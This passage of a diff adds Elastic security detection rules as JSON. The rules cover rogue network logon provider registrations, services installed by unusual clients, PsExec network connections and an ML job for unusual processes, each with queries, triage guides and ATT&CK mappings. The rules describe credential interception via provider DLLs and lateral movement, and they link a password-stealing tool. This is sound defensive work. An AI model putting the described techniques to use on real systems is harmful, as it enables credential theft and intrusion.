system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.data.strings : \"?*\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\NetworkProvider\\\\ProviderPath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\NetworkProvider\\\\ProviderPath\"\n ) and\n /* Excluding default NetworkProviders RDPNP, LanmanWorkstation and webclient. */\n not (\n user.id : \"S-1-5-18\" and\n registry.data.strings : (\n \"%SystemRoot%\\\\System32\\\\ntlanman.dll\",\n \"%SystemRoot%\\\\System32\\\\drprov.dll\",\n \"%SystemRoot%\\\\System32\\\\davclnt.dll\",\n \"%SystemRoot%\\\\System32\\\\vmhgfs.dll\",\n \"?:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\x64\\\\pnsson.dll\",\n \"?:\\\\Program Files\\\\Dell\\\\SARemediation\\\\agent\\\\DellMgmtNP.dll\",\n \"?:\\\\Program Files (x86)\\\\CheckPoint\\\\Endpoint Connect\\\\\\\\epcgina.dll\"\n )\n )\n", + "references": [ + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "54c3d186-0461-4dc3-9b33-2dc5c7473936", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "54c3d186-0461-4dc3-9b33-2dc5c7473936_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_109.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_109.json new file mode 100644 index 00000000000..e0caffa9d25 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_109.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of the network logon provider registry. Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in clear text during user logon.", + "false_positives": [ + "Authorized third party network logon providers." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Logon Provider Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Network Logon Provider Registry Modification\n\nNetwork logon providers are components in Windows responsible for handling the authentication process during a network logon.\n\nThis rule identifies the modification of the network logon provider registry. Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in plain text during user logon.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the `registry.data.strings` field to identify the DLL registered.\n- Identify the process responsible for the registry operation and the file creation and investigate their process execution chains (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n - Investigate any abnormal behavior by the subject process, such as network connections, DLLs loaded, registry or file modifications, and any spawned child processes.\n- Retrieve the file and examine if it is signed with valid digital signatures from vendors that are supposed to implement this kind of software and approved to use in the environment. Check for prevalence in the environment and whether they are located in expected locations.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executables of the processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- False Positives can include legitimate software installations or updates that modify the network logon provider registry. These modifications may be necessary for the proper functioning of the software and are not indicative of malicious activity.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.data.strings : \"?*\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\NetworkProvider\\\\ProviderPath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\NetworkProvider\\\\ProviderPath\"\n ) and\n /* Excluding default NetworkProviders RDPNP, LanmanWorkstation and webclient. */\n not (\n user.id : \"S-1-5-18\" and\n registry.data.strings : (\n \"%SystemRoot%\\\\System32\\\\ntlanman.dll\",\n \"%SystemRoot%\\\\System32\\\\drprov.dll\",\n \"%SystemRoot%\\\\System32\\\\davclnt.dll\",\n \"%SystemRoot%\\\\System32\\\\vmhgfs.dll\",\n \"?:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\x64\\\\pnsson.dll\",\n \"?:\\\\Program Files\\\\Dell\\\\SARemediation\\\\agent\\\\DellMgmtNP.dll\",\n \"?:\\\\Program Files (x86)\\\\CheckPoint\\\\Endpoint Connect\\\\\\\\epcgina.dll\"\n )\n )\n", + "references": [ + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "54c3d186-0461-4dc3-9b33-2dc5c7473936", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "54c3d186-0461-4dc3-9b33-2dc5c7473936_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_108.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_108.json new file mode 100644 index 00000000000..526c8fec9a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_108.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a Windows service by an unusual client process. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Windows Service Installed via an Unusual Client", + "query": "event.action:\"service-installed\" and\n (winlog.event_data.ClientProcessId:\"0\" or winlog.event_data.ParentProcessId:\"0\") and\n not winlog.event_data.ServiceFileName : (\n \"C:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\" or\n \"%SystemRoot%\\\\system32\\\\Drivers\\\\Crowdstrike\\\\17706-CsInstallerService.exe\"\n )\n", + "references": [ + "https://www.x86matthew.com/view_post?id=create_svc_rpc", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0100_windows_audit_security_system_extension.md" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ClientProcessId", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ParentProcessId", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ServiceFileName", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", + "setup": "## Setup\n\nThe 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "55c2bf58-2a39-4c58-a384-c8b1978153c2_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_108.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_108.json new file mode 100644 index 00000000000..859a031bb47 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_108.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement.", + "false_positives": [ + "PsExec is a dual-use tool that can be used for benign or malicious activity. It's important to baseline your environment to determine the amount of noise to expect from this tool." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "PsExec Network Connection", + "note": "## Triage and analysis\n\n### Investigating PsExec Network Connection\n\nPsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. Microsoft develops it as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections.\n\nThis rule identifies PsExec execution by looking for the creation of `PsExec.exe`, the default name for the utility, followed by a network connection done by the process.\n\n#### Possible investigation steps\n\n- Check if the usage of this tool complies with the organization's administration policy.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the target computer and its role in the IT environment.\n- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"PsExec.exe\" and event.type == \"start\" and\n\n /* This flag suppresses the display of the license dialog and may\n indicate that psexec executed for the first time in the machine */\n process.args : \"-accepteula\" and\n\n not process.executable : (\"?:\\\\ProgramData\\\\Docusnap\\\\Discovery\\\\discovery\\\\plugins\\\\17\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Docusnap 11\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Program Files\\\\Docusnap X\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Program Files\\\\Docusnap X\\\\Tools\\\\dsDNS.exe\") and\n not process.parent.executable : \"?:\\\\Program Files (x86)\\\\Cynet\\\\Cynet Scanner\\\\CynetScanner.exe\"]\n [network where host.os.type == \"windows\" and process.name : \"PsExec.exe\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "55d551c6-333b-4665-ab7e-5d14a59715ce", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + }, + { + "id": "T1570", + "name": "Lateral Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1570/" + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "55d551c6-333b-4665-ab7e-5d14a59715ce_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_3.json b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_3.json new file mode 100644 index 00000000000..39fcf3dae97 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_3.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_host", + "name": "Unusual Process Spawned by a Host", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "56004189-4e69-4a39-b4a9-195329d226e9", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "56004189-4e69-4a39-b4a9-195329d226e9_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_4.json b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_4.json new file mode 100644 index 00000000000..66d9f442153 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_4.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_host", + "name": "Unusual Process Spawned by a Host", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "56004189-4e69-4a39-b4a9-195329d226e9", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: If the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and check whether any ProblemChild predictions have been generated.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": 